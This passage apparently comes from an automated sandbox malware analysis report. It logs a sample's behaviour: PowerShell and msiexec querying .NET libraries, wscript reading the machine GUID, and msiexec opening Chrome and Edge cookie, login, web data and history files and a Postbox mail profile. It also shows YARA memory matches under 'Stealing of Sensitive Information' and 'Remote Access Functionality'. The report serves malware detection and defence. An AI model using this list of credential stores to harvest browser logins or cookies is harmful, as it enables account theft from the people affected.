Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior

Remote Access Functionality

Source: Yara match File source: 00000008.00000002.2594642585.0000000023841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY